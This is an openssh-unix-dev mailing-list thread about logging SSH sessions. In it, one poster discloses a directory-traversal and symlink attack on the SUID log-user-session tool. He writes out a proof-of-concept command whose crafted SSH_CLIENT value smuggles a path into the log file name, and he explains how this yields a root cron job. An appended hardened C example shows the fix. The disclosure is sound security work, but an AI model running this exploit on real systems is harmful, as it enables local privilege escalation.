Konrad Bucheli writes:
> Hi,
> Did you check out log-user-session ? It can be used to record
> the output of ssh shell sessions in a tamper-proof way. And
> it is open source.
>  https://github.com/open-ch/log-user-session
Well, using a SUID-binary in that way partially eliminates the
benefits of tamper-proof logging by increasing the attack surface,
e.g. by allowing each user to create arbitrary files using directory
traversal and symlink attacks, e.g. by calling
SSH_CLIENT="169.254.0.1/../../../../tmp/ 1234 22" /usr/local/bin/log-user-session 'echo "* * * * * root /usr/bin/touch /dead.txt"'
to start the directory traversal and lead to the problematic open
5885 openat(AT_FDCWD, "/var/log/user-session/localhost-build-20181122-140817-169.254.0.1/../../../../tmp/-5883.log", O_WRONLY|O_CREAT|O_APPEND, 0400) = 3
Without symlink protection, linking the "-[guessable pid].log" file
to "/etc/cron.d/dead" will give you root easily. Even with protection,
something should be possible ...
I am currently also writing a tool for a similar reason. To be
really tamper-proof, my solution is preloaded into SSH to intercept
the encryption master key for each session, sends it to a daemon,
that will use a public key to encrypt it and offload it to another
machine. Together with the full-packet-captures of all SSH connections
done by the network infrastructure, I would hope for a tamper-proof
but still secure solution BUT (ha, ha, ha) - it is not ready yet.
hd

> On 03.11.18 at 18:08, Kaushal Shriyan wrote:
>> Are there any open source tools to keep track of ssh sessions?
>> For example, if a specific user is ssh logging to remote server
>> and what commands or scripts are being run. Basically, I need
>> to log all users' sessions.
>> Thanks in advance and I look forward to hearing from you.
>> Best Regards,
>> Kaushal
>> _______________________________________________
>> openssh-unix-dev mailing list
> --
> konrad bucheli
> principal systems engineer
> open systems ag
> raeffelstrasse 29
> ch-8045 zurich
> t: +41 58 100 10 10
> f: +41 58 100 10 11
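A hardened version of the log-path construction hd criticises above (treat the SSH_CLIENT address as untrusted, accept it only as an IPv4/IPv6 literal, then create the log with O_EXCL|O_NOFOLLOW relative to a directory fd), written as an added example for this thread; it is not code from log-user-session or from any poster, and the function names and the "<addr>-<pid>.log" naming are assumptions:

```c
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Extract the client address from an SSH_CLIENT value ("addr port serverport")
 * and accept it only if inet_pton() parses it as an IPv4 or IPv6 literal.
 * The "169.254.0.1/../../../../tmp/" value from the thread fails that check,
 * so the address can never smuggle a path component into a file name.
 * Returns 1 and copies the address to out, or returns 0. */
int parse_ssh_client_addr(const char *ssh_client, char *out, size_t outlen)
{
    if (ssh_client == NULL)
        return 0;
    size_t n = strcspn(ssh_client, " ");        /* length of the first field */
    if (n == 0 || n >= outlen || n >= INET6_ADDRSTRLEN)
        return 0;
    char addr[INET6_ADDRSTRLEN];
    memcpy(addr, ssh_client, n);
    addr[n] = '\0';
    unsigned char bin[16];
    if (inet_pton(AF_INET, addr, bin) != 1 && inet_pton(AF_INET6, addr, bin) != 1)
        return 0;
    memcpy(out, addr, n + 1);
    return 1;
}

/* Create "<addr>-<pid>.log" inside logdir, resolving the name relative to a
 * directory fd with O_EXCL|O_NOFOLLOW: a file or symlink planted under a
 * guessed pid makes the open fail instead of being followed (contrast the
 * O_WRONLY|O_CREAT|O_APPEND openat() in the strace line quoted above).
 * Returns the open fd, or -1 on any failure. */
int open_session_log(const char *logdir, const char *ssh_client, pid_t pid)
{
    char addr[INET6_ADDRSTRLEN];
    if (!parse_ssh_client_addr(ssh_client, addr, sizeof addr))
        return -1;
    int dirfd = open(logdir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dirfd < 0)
        return -1;
    char name[INET6_ADDRSTRLEN + 32];           /* addr + "-" + pid + ".log" always fits */
    snprintf(name, sizeof name, "%s-%ld.log", addr, (long)pid);
    int fd = openat(dirfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0400);
    close(dirfd);
    return fd;
}
```

The log directory itself still has to be owned by root and not writable by the logged users, otherwise a pre-created file only turns the attack into a denial of service rather than removing it.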